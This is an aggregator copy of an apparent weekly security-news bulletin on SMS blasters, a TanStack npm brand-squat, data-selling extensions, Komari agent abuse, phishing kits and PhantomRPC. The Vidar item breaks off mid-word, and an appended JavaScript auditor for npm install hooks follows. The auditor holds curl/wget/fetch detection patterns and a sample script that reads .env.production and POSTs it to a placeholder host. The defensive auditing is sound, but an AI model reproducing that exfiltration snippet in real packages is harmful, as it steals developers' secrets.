Security News

Cybersecurity news aggregator

CRITICAL News The Hacker News

ThreatsDay Bulletin: SMS Blaster Busts, OpenEMR Flaws, 600K Roblox Hacks and 25 More Stories

This bulletin highlights several active threats, including an SMS blaster attack vector in which rogue devices impersonate cell towers to send phishing texts, and a supply chain attack via a malicious npm package (`tanstack` versions 2.0.4 through 2.0.7) that exfiltrates developer environment variables during installation. It also references the critical BlueKeep vulnerability (CVE-2019-0708, CVSS 9.8) affecting Microsoft Windows 7, Windows Server 2008, and Windows Server 2008 R2; patched version numbers are not listed.

Ravie Lakshmanan | Apr 30, 2026 | Hacking News / Cybersecurity News

The internet is noisy this week. We are seeing some wild new tactics, like people using fake cell towers to send scam texts, while some developers are accidentally downloading tools that peek into their private files during a simple install. It is definitely a busy time to be online.

Security is always a moving target. Millions of servers are currently sitting online without any passwords, and old software bugs are showing up in the most unexpected places. Even with the right fixes available, staying one step ahead is a full-time job for all of us.

Data is shifting in strange ways, too. Some browser tools are now legally selling user history for profit, and new kits are making it simpler for almost anyone to launch a campaign. You have to see these latest updates to believe them. Let's look at the full list...

SMS blaster phishing crackdown
Canadian Authorities Arrest 3 Men for Alleged Use of SMS Blaster

Canadian authorities have arrested three men for operating an SMS blaster device that masquerades as a cellular tower to send phishing texts to nearby phones. These tools trick devices into connecting to them by emitting signals that mimic a legitimate tower. "An SMS blaster works by mimicking a legitimate cellular tower. When nearby phones connect to it, users receive fraudulent text messages that appear to come from trusted organizations," authorities said. "These messages often prompt recipients to click on links that lead to fake websites designed to capture personal information, including banking credentials and passwords." The three men are facing 44 charges in connection with the crime. Tens of thousands of devices connected to the blaster over several months, officials said. This is the first time an SMS blaster has been spotted in the country.
npm brandsquat data theft
npm Package Brand-Squats TanStack to Exfiltrate Environment Variables

A new supply chain attack has leveraged an npm package impersonating TanStack to ship malicious versions that exfiltrate environment variables from developers' machines during install. The package, named tanstack, is designed to "silently steal environment variable files, including .env, .env.local, and .env.production, from developers' machines at install time, exfiltrating them to an attacker-controlled endpoint," Socket said. The malicious package is maintained by a user named "sh20raj." Versions 2.0.4 through 2.0.7 are confirmed malicious.

Extensions legally sell user data
Extension Developers Sell Data of At Least 6.5M Users

In a new analysis, LayerX found that multiple networks of browser extensions collect user data and resell it for profit. Unlike malicious extensions that conceal their behavior behind some harmless functionality, the 80 identified extensions explicitly state in their privacy policies that they collect and sell the data of users who install them. "A network of 24 media extensions that are installed on 800,000 users and collect viewing data and demographic information on major streaming platforms such as Netflix, Hulu, Disney+, Amazon Prime Video, HBO, Apple TV, and others," LayerX said. "12 separate ad blockers with a combined install base of over 5.5 million users openly selling user data. Nearly 50 other extensions, with over 100,000 users in aggregate, that collected and resold users' browsing data."

Komari tool weaponized in attacks
First Recorded Abuse of Komari Agent

Huntress has revealed that unknown threat actors used stolen VPN credentials to pivot into a Windows workstation belonging to an unspecified organization via Impacket's smbexec.py, and dropped a SYSTEM-level backdoor using the Komari agent, a Go-based remote-control, monitoring, and management tool.
The development marks the first publicly documented case of the tool being abused in a real-world intrusion. It also illustrates how bad actors are increasingly switching to publicly available, legitimate tools to conduct attacks. "Komari is not a telemetry tool that happens to be abusable - it is a bidirectional control channel by design. The agent opens a persistent WebSocket to its server and accepts three server-to-agent event types out of the box: exec (arbitrary command execution via PowerShell / sh), terminal (interactive PTY reverse shell in the operator's browser), and ping (ICMP / TCP / HTTP probing)," Huntress said. "All three are enabled by default." Whereas other tools abused by threat actors, such as Velociraptor and SimpleHelp, typically act as a means to an end, Komari gives an operator arbitrary command execution, an interactive PTY reverse shell, and network probing by default, over a TLS-fronted WebSocket.

Next-gen phishing kits escalate
New Saiga 2FA and Phoenix System Phishing Kits Spotted

Researchers have detailed two new phishing kits named Saiga 2FA and Phoenix System that have been linked to email and SMS phishing attacks. According to Barracuda, Saiga 2FA goes beyond traditional adversary-in-the-middle (AitM) features by integrating tools like FM Scanner for extracting and analyzing mailbox content. "Saiga 2FA is an example of how phishing kits are evolving into application-level platforms," the company said. "Unlike traditional phishing kits, Saiga integrates infrastructure, automation, and post-compromise capabilities into a unified system, supporting advanced and highly targeted campaigns." Phoenix System, on the other hand, has been tied to over 2,500 phishing domains since January 2025, while relying on IP-based filtering and geofencing for precision targeting. It's assessed to be the successor to the now-defunct Mouse System.
"The campaigns are delivered via SMS, potentially leveraging fake Base Transceiver Stations (BTS) to bypass carrier-level filtering and allow threat actors to send messages that appear under the brand names of trusted organizations directly to victims," Group-IB said. "The campaign has so far targeted more than 70 organizations across the financial services, telecommunications, and logistics sectors globally."

Mass exposure of remote access servers
Exposed RDP and VNC Servers Found

A new analysis from Forescout has found 1.8 million RDP and 1.6 million VNC servers exposed on the internet. "China accounts for 22% of exposed RDP and 70% of exposed VNC servers; the U.S. accounts for 20% and 7%; Germany accounts for 8% and 2%," the company said. "Of 91,000 RDP and 29,000 VNC servers mapped to specific industries, retail, services, and education lead RDP exposure; education, services, and healthcare lead VNC." What's more, 18% of exposed RDP servers run end-of-life Windows versions, more than 19,000 RDP servers remain vulnerable to BlueKeep (CVE-2019-0708), and nearly 60,000 VNC servers have authentication disabled. To make matters worse, more than 670 of those exposed VNC servers with authentication disabled provide direct access to OT/ICS control panels.

China-linked influence op falters
Spamouflage Attempts to Influence Tibetan Parliament-in-Exile Elections

A China-linked online influence campaign attempted to undermine the April 26 elections for the Tibetan parliament-in-exile, with little impact. The operation, part of Spamouflage, a long-running influence network linked to Beijing, used a cluster of 90 Facebook profiles and 13 Instagram profiles to push criticism of the Tibetan government-in-exile and its leadership. "The network tries to drive wedges within the community," DFRLab said. "The goal is to erode trust in the exile government, weaken its international voice, and raise doubts about whether it can credibly represent Tibetans without the Dalai Lama.
However, virtually none of these posts seem to have attracted any organic engagement, possibly because all the identified assets are regular Facebook profiles with limited reach and not established pages."

Unpatched RPC privilege escalation
Windows PhantomRPC Privilege Escalation Remains Unpatched

An unpatched vulnerability can allow local privilege escalation on Windows systems through abuse of the operating system's Remote Procedure Call (RPC) architecture. Called PhantomRPC, the flaw stems from an architectural weakness in how RPC handles connections to unavailable services. To exploit the flaw, an attacker with limited local access first needs to compromise a privileged service that runs under the Network Service identity, deploy a fake RPC server with the same RPC interface UUID and exposed endpoint name (i.e., TermService), listen for specific requests, and then impersonate the targeted service to escalate privileges to SYSTEM. Kaspersky, which identified the weakness, said it discovered four PhantomRPC exploitation paths that could lead to privilege escalation. Following responsible disclosure in September 2025, Microsoft opted not to address the issue, as it requires an attacker to first compromise the machine through some other means.

Vidar dominates infostealer market
Vidar Stealer Races to the Top

The information stealer known as Vidar (now in its second iteration, Vidar Stealer 2.0) has vaulted to the top of the infostealer market since November 2025, in the aftermath of law enforcement takedowns of Lumma and Rhadamanthys. "Vidar profited from the generated chaos to rise to the top of the stealer ecosystem," Intrinsec said. "We assess that this rise was made available due to the release of version 2.0 of the malware, and to the collaboration with 'Cloud' Telegram channels." It's advertised by a user named "Loadbaks" on underground forums.
Recent campaigns have been observed distributing malware that has used bogus links shared via YouTube videos promoting fake software to direct users to Mediafire pages, which are used to deliver executables responsible for downloading and running the broad-spectrum credential harves
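Returning to the TanStack brand-squat item earlier in this bulletin: the following is an added example, not code from The Hacker News, Socket or the TanStack project. It audits a package's lifecycle hooks before install for references to .env files and network calls, and checks the name and version against the 2.0.4 through 2.0.7 range the bulletin reports as malicious. The package.json and setup.js contents are constructed fixtures, and the collector hostname is a placeholder.

```javascript
// Added example (not from The Hacker News, Socket or TanStack): audit an npm
// package before install for lifecycle hooks that touch .env files or the
// network, and check it against the malicious versions named in the bulletin.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Matches quoted paths such as '.env' or ".env.local", but not process.env.FOO
const ENV_FILE_RE = /['"\/]\.env(\.[A-Za-z]+)?['"]/;
const NETWORK_RE = /\b(fetch|https?\.(request|get)|net\.connect)\s*\(|\b(curl|wget)\s/;
// Known-bad range from the bulletin: tanstack 2.0.4 through 2.0.7 (inclusive)
const KNOWN_BAD = { tanstack: [['2.0.4', '2.0.7']] };
function cmpVersion(a, b) {
  const pa = a.split('.').map(Number), pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}
function isKnownBad(name, version) {
  return (KNOWN_BAD[name] || []).some(([lo, hi]) =>
    cmpVersion(version, lo) >= 0 && cmpVersion(version, hi) <= 0);
}
// pkg: parsed package.json; scriptSources: { 'file.js': contents } for local
// scripts the hooks invoke. Returns findings ordered high -> medium -> info.
function auditPackage(pkg, scriptSources = {}) {
  const findings = [];
  if (isKnownBad(pkg.name, pkg.version)) {
    findings.push({ severity: 'high', hook: null,
      detail: `${pkg.name}@${pkg.version} is a known malicious release` });
  }
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (!cmd) continue;
    // Inspect the command line plus any local Node script it runs
    const m = cmd.match(/\bnode\s+(\S+\.c?js)\b/);
    const text = m && scriptSources[m[1]] ? `${cmd}\n${scriptSources[m[1]]}` : cmd;
    const readsEnv = ENV_FILE_RE.test(text), usesNet = NETWORK_RE.test(text);
    const reasons = [readsEnv && 'reads .env files', usesNet && 'uses the network'].filter(Boolean);
    const severity = reasons.length === 2 ? 'high' : reasons.length === 1 ? 'medium' : 'info';
    findings.push({ severity, hook, detail: reasons.join(', ') || 'lifecycle script present' });
  }
  const rank = { high: 0, medium: 1, info: 2 };
  return findings.sort((a, b) => rank[a.severity] - rank[b.severity]);
}
// Constructed fixture modelled on the bulletin's description, not the real package
const SAMPLE_PKG = { name: 'tanstack', version: '2.0.5', scripts: { postinstall: 'node setup.js' } };
const SAMPLE_SCRIPTS = { 'setup.js': "const d = fs.readFileSync('.env.production', 'utf8');\nfetch('https://collector.example.invalid', { method: 'POST', body: d });" };
console.log(auditPackage(SAMPLE_PKG, SAMPLE_SCRIPTS));
```

Pairing a check like this with `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) stops lifecycle hooks from running until a reviewer has looked at them.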
